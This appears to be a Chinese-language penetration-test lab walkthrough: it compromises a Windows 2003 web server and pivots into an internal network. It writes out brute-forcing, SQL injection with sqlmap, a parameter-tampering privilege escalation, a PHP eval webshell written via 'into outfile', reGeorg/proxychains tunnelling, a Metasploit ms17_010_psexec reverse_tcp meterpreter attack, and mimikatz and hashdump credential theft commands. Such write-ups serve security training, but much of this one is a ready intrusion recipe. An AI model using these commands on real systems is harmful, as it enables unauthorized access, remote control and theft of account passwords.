前言
目標:給出一個目標機ip,得到該服務器權限,並通過該ip滲透至內網控制內網的兩台服務器
攻擊機:kali (192.168.31.51)
目標機:windows 2003 (192.168.31.196)
1.暴力破解
在前台“會員登陸”發現用戶的賬號
使用burpsuite爆破出弱口令密碼
成功登陸用戶界面
2.SQL注入
在網站首頁發現SQL注入點
使用sqlmap工具獲得管理員賬號和密碼
3.越權添加網站后台超管
進入kefu管理員后台,發現是普通管理員權限,很多操作受限制
通過抓包發現可以修改權限,將“submanage”修改為“manage”,然后放包
成功將“普通管理員”權限修改為“超級管理員”,然后再抓包發現“包”中的權限還是“submanage”,繼續修改為“manage”
修改成功,【在這個網站中,普通管理員想要操作不受限制,沒次操作都可抓包修改為“manage”,所以在這里我利用此漏洞直接添加一個超管,便於操作】
成功登陸我剛新建的超管“let”
4.getshell
通過ip訪問此網站,發現該網站存在“探針”,可以查看到當前網站目錄
通過sql注入出的管理員賬戶密碼,登陸“data”管理員后台,發現此管理員有執行sql語句的權限,利用數據庫命令,將“php一句話”寫入到網站根目錄下
例如:select "<?php eval($_POST['pass']);?>" into outfile "C:/UPUPW_AP5.2/htdocs/wlt.php"
成功用“菜刀”連接網站后台
5.添加系統賬戶【超管】
上傳一個“php大馬”
利用“大馬”執行命令,創建系統超管賬戶
掃描發現3389端口開啟,遠程連接到系統
6.隧道代理-端口轉發
開啟reGeorg監聽:python reGeorgSocksProxy.py -p 9527 -u http://192.168.31.196/tunnel.php
使用proxychains工具
設置代理,先vi /etc/proxychains.conf編輯,再將第二行命令運行【復制相關文件,需要調用】,最后添加firefox和nmap等用到的工具
取消圖中的注釋
添加通道5,代理監聽的端口,例如9527
使用nmap工具查詢開放的端口
通過用戶想要使用的應用程序運行ProxyChains,例如,啟動msfconsole
執行命令:proxychains msfconsole
如下圖所示,輸入命令執行腳本便可連接到目標主機
【1】set payload windows/x64/meterpreter/reverse_tcp
或者set payload windows/meterpreter/reverse_tcp //針對目標機器使用的系統版本,目標機器32位就使用32位
【2】set LHOST 本機IP
【3】use exploit/windows/smb/ms17_010_psexec【腳本】
【4】set RHOST 目標IP
【5】run
如下圖所示,表示成功連接到了目標主機,可輸入相應的命令來達到目的
代理獲取系統賬戶和密碼
獲取加密密碼
例如輸入命令:run post/windows/gather/smart_hashdump,可以獲取目標主機的賬戶和密碼
獲取明文密碼
利用mimikatz獲取明文密碼,命令如下【我只用了兩條命令】:
meterpreter > load mimikatz #加載mimikatz
meterpreter > msv #獲取hash值
meterpreter > kerberos #獲取明文
meterpreter >ssp #獲取明文信息
meterpreter > wdigest #獲取系統賬戶信息
meterpreter >mimikatz_command -f a:: #必須要以錯誤的模塊來讓正確的模塊顯示
meterpreter >mimikatz_command -f hash:: #獲取目標 hash
meterpreter > mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
開啟3389端口
用run getgui -e命令開啟3389端口
遠程連接
使用遠程連接,連接目標主機:proxychains rdesktop 192.168.238.129和proxychains rdesktop 192.168.238.130
